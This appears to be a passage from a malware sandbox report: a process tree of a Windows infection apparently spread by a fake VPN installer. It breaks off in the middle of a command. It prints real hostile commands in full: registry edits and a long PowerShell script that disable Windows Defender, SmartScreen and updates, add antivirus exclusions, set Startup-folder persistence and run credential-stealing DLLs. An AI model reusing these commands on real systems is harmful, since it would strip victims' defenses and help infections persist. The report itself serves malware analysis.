C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{19361697-2886-4e45-825d-4a137310f558}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "0000000000000174" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000190"2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\New Feature\5.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\5.exe"1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6848 -s 15282⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CmD < Cio.mui2⤵
-
C:\Windows\SysWOW64\cmd.exeCmD3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CmD < Estate.mp42⤵
-
C:\Windows\SysWOW64\cmd.exeCmD3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P535U.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-P535U.tmp\Setup3310.tmp" /SL5="$70470,138429,56832,C:\Users\Admin\AppData\Local\Temp\qb0qnq3pupg\Setup3310.exe" /Verysilent /subid=5771⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2N8GQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2N8GQ.tmp\Setup.exe" /Verysilent2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exeC:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exe 9n /site_id 754 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\F3C8.tmp.exeC:\Users\Admin\AppData\Local\Temp\F3C8.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\10E6.tmp.exeC:\Users\Admin\AppData\Local\Temp\10E6.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1B48.tmp.exeC:\Users\Admin\AppData\Local\Temp\1B48.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\27FB.exeC:\Users\Admin\AppData\Local\Temp\27FB.exe1⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\d76f0cb0-fdfb-4d54-aa80-7dddcf254441" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\27FB.exe"C:\Users\Admin\AppData\Local\Temp\27FB.exe" --Admin IsNotAutoStart IsNotTask2⤵
-
C:\Users\Admin\AppData\Local\8115c25c-bdbe-41a1-9806-4b9278ed3dc2\5.exe"C:\Users\Admin\AppData\Local\8115c25c-bdbe-41a1-9806-4b9278ed3dc2\5.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8115c25c-bdbe-41a1-9806-4b9278ed3dc2\5.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3EFE.tmp.exeC:\Users\Admin\AppData\Local\Temp\3EFE.tmp.exe1⤵
-
C:\ProgramData\eb0f642350\bkdm.exe"C:\ProgramData\eb0f642350\bkdm.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\eb0f642350\3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\eb0f642350\4⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\012e29e2d8a463\cred.dll, Main3⤵
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\012e29e2d8a463\scr.dll, Main3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\4D86.tmp.exeC:\Users\Admin\AppData\Local\Temp\4D86.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\4D86.tmp.exe"C:\Users\Admin\AppData\Local\Temp\4D86.tmp.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventOverride' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeShutdownErrs' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'AllOrNone' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeMicrosoftApps' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeWindowsApps' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Scan_ScheduleDay' -Value 8; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideScan_ScheduleTime' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableEnhancedNotifications' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableGenericRePorts' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideSpynetReporting' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SpynetReporting' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'SubmitSamplesConsent' -Value 2; $key='HKLM:\software\microsoft\Security Center';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AntiVirusDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'FirewallDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UpdatesDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UacDisableNotify' -Value 1; $key='HKLM:\software\Policies\Microsoft\MRT';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DontReportInfectionInformation' -Value 1; $key='HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose};New-ItemProperty -Path $key -Name 'DisableWindowsUpdateAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'SetDisableUXWUAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'DoNotConnectToWindowsUpdateInternetLocations' -Value 1 -Force -Verbose;New-ItemProperty -Path $key -Name 'DisableOSUpgrade' -Value 1 -Force -Verbose; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoAutoUpdate' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableFeaturedSoftware' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowFastServiceStartup' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ServiceKeepAlive' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PUAProtection' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MpEnablePus' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRealtimeMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBehaviorMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableIOAVProtection' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableOnAccessProtection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRawWriteNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableScanOnRealtimeEnable' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\System';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSmartScreen' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Features';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TamperProtection' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ProductStatus' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ManagedDefenderProductType' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRoutinelyTakingAction' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'OneTimeSqmDataSent' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ScanParameters' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ScheduleDay' -Value 8; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TaskbarNoNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HideSCAHealth' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer';if((Test-Path $key) -ne $TRUE){New-Item 